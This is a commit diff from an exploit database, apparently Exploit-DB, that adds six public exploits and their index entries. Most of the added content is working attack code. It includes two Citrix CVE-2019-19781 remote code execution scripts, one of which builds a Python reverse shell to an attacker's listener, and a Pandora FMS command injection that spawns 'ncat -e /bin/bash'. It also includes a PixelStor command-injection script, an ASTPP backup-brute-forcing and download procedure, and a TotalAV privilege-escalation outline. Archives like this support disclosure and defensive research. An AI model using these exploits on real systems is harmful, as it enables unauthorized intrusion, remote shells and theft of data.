DB: 2020-01-11

6 changes to exploits/shellcodes

TotalAV 2020 4.14.31 - Privilege Escalation
Pandora 7.0NG - Remote Code Execution
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
ASTPP 4.0.1 VoIP Billing - Database Backup Download
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution
This commit is contained in:
Offensive Security 2020-01-11 05:02:00 +00:00
parent de1e6651e0
commit d3ca859971
7 changed files with 358 additions and 0 deletions

View file

@ -0,0 +1,56 @@
# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
# Date: 2019-11-18
# Exploit Author: Fabien AUNAY
# Vendor Homepage: https://www.astppbilling.org/
# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
# Version: 4.0.1 vendor default setup script
# Tested on: Debian 9 - CentOS 7
# CVE : -
###########################################################################################################
ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download
A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
It is available as an open source solution. It means without any investment, one can start his telephony
business using ASTPP.
ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
solution to “A Smart TelePhony Platform”.
The latest version of ASTPP is provisioned with some advanced functional modules which are designed
to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
Technology.
When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.
The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz
Pattern review:
- astpp_
- year
- month
- day
- 6 PIN digit
Steps:
Objective 1 : Generate your 6 PIN list
Objective 2 : FUZZ the target URL
Objective 3 : Download the mysqldump
###########################################################################################################
Objective 1: Generate your 6 PIN list
POC: crunch 6 6 0123456789 > pin_fuzzer.list
Objective 2 : FUZZ the target URL
POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz'
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000080137: 200 1135 L 6859 W 550239 Ch "080136"
Objective 3 : Download the mysqldump
POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz
astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3

View file

@ -0,0 +1,23 @@
#!/bin/bash
# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
# Release Date : 11/01/2020
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
echo "=================================================================================
___ _ _ ____ ___ _ _
| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _
| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' |
|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_|
|__/ CVE-2019-19781
================================================================================="
##############################
if [ -z "$1" ];
then
echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
exit;
fi
filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
echo -ne "Command Output :\n"
curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is

View file

@ -0,0 +1,132 @@
#!/usr/bin/python3
#
# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
#
# You only need a listener like netcat to catch the shell.
#
# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
#
# Tool Written by: Rob Simon and David Kennedy
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
import random
import string
import time
from random import randint
import argparse
import sys
# random string generator
def randomString(stringLength=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
# our random string for filename - will leave artifacts on system
filename = randomString()
randomuser = randomString()
# generate random number for the nonce
nonce = randint(5, 15)
# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
# note that the file location will be in /netscaler/portal/templates/filename.xml
def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):
# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
encoded = ""
i=0
text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
while i < len(text):
encoded = encoded + "chr("+str(ord(text[i]))+") . "
i += 1
encoded = encoded[:-3]
payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
headers = (
{
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
'NSC_NONCE' : '%s' % (nonce),
})
data = (
{
"url" : "127.0.0.1",
"title" : payload,
"desc" : "desc",
"UI_inuse" : "a"
})
url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
requests.post(url, data=data, headers=headers, verify=False)
# this is our second stage that triggers the exploit for us
def stage2(filename, randomuser, nonce, victimip, victimport):
headers = (
{
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
'NSC_USER' : '%s' % (randomuser),
'NSC_NONCE' : '%s' % (nonce),
})
requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)
# start our main code to execute
print('''
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
Tool Written by: Rob Simon and Dave Kennedy
Contributions: The TrustedSec Team
Website: https://www.trustedsec.com
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
to append files in an XML format to the victim machine. This in turn allows for remote code execution.
Be sure to cleanup these two file locations:
/var/tmp/netscaler/portal/templates/
/netscaler/portal/templates/
Usage:
python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')
# parse our commands
parser = argparse.ArgumentParser()
parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
parser.add_argument("targetport", help="the target server web port (normally on 443)")
parser.add_argument("attackerip", help="the attackers reverse listener IP address")
parser.add_argument("attackerport", help="the attackersa reverse listener port")
args = parser.parse_args()
print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
# trigger our first post
stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
time.sleep(2)
print("[*] Triggering GET request for the newly created file with a listener waiting...")
print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
# trigger our second post
stage2(filename, randomuser, nonce, args.target, args.targetport)

71
exploits/php/webapps/47898.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Pandora 7.0NG - Remote Code Execution
# Date: 2019-11-14
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2019-20224
# Vendor Homepage: https://pandorafms.org/
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Version: v7.0NG
# Tested on: CentOS 7.3 / PHP 5.4.16
#!/usr/bin/python3
import requests
import sys
if len(sys.argv) !=3D 6:
print("[+] Usage : ./exploit.py target username password ip port")
exit()
target =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D int(sys.argv[5])
request =3D requests.session()
login_info =3D {
"nick": username,
"pass": password,
"login_button": "Login"
}
login_request =3D request.post(
target+"/pandora_console/index.php?login=3D1",
login_info,
verify=3DFalse,
allow_redirects=3DTrue
)
resp =3D login_request.text
if "User not found in database" in resp:
print("[-] Login Failed")
exit()
else:
print("[+] Logged In Successfully")
print("[+] Sending crafted graph request ..")
body_request =3D {
"date": "0",
"time": "0",
"period": "0",
"interval_length": "0",
"chart_type": "netflow_area",
"max_aggregates": "1",
"address_resolution": "0",
"name": "0",
"assign_group": "0",
"filter_type": "0",
"filter_id": "0",
"filter_selected": "0",
"ip_dst": "0",
"ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
"draw_button": "Draw"
}
draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
on/netflow/nf_live_view&pure=3D0"
print("[+] Check your netcat ;)")
request.post(draw_url, body_request)

35
exploits/php/webapps/47899.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: PixelStor 5000 - Remote Code Execution
# Product: PixelStor 5000
# Vendor: Rasilient
# Date: 2020-01-08
# Exploit Author: .:UND3R:.
# Vendor Homepage: http://rasilient.com
# Version: K:4.0.1580-20150629 (KDI Version)
# Tested on: K:4.0.1580-20150629 (KDI Version)
# CVE: CVE-2020-6756
# URL Author: https://pwnedchile.com
# Thanks: Dani Pelotocino <3, Roit
import requests, sys
def poc(target, cmd):
url = target + "/Option/languageOptions.php"
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
data = {"lang": ";" + cmd + ";/bin/echo -n en"}
r = requests.post(url, headers=headers, data=data)
if(r.status_code == 200):
print("\nPwned :]")
else:
print("\nNot vulnerable :(")
print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")
if len(sys.argv) !=2:
print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
sys.exit(1)
if __name__ == "__main__":
url = sys.argv[1]
cmd = raw_input("\n[Linux Command]:")
poc(url, cmd)
#EoF

View file

@ -0,0 +1,35 @@
# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation
# Date: 2020-01-09
# Exploit Author: Kusol Watchara-Apanukorn
# Vendor Homepage: https://www.totalav.com/
# Version: 4.14.31
# Fixed on: 5.3.35
# Tested on: Windows 10 x64
# CVE : N/A
# Vulnerability Description:
# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
# privilege by using NTFS directory junction.
**You can download vulnerability version with this link:
https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe
///////////////////////////////////
Proof of Concept
//////////////////////////////////
1. Plant the malicious file in this case we use DLL file
2. To exploit the vulnerability antivirus must detect the malicious dll
3. Move it to quarantine.
4. Attacker must create NTFS directory junction to restore
Full step: https://www.youtube.com/watch?v=88qeaLq98Gc
Vulnerability Disclosure Timeline:
==================================
17 Oct, 19 : Found Vulnerability
18 Oct, 19 : Vendor Notification
18 Oct, 19 : Request CVE
21 Oct, 19 : Vendor Response
mid Dec, 19 : Vendor released new patched (v5.3.35)
09 Jan, 20: Vulnerability Disclosure

View file

@ -10887,6 +10887,7 @@ id,file,description,date,author,type,platform,port
47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42197,3 +42198,8 @@ id,file,description,date,author,type,platform,port
47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,

Can't render this file because it is too large.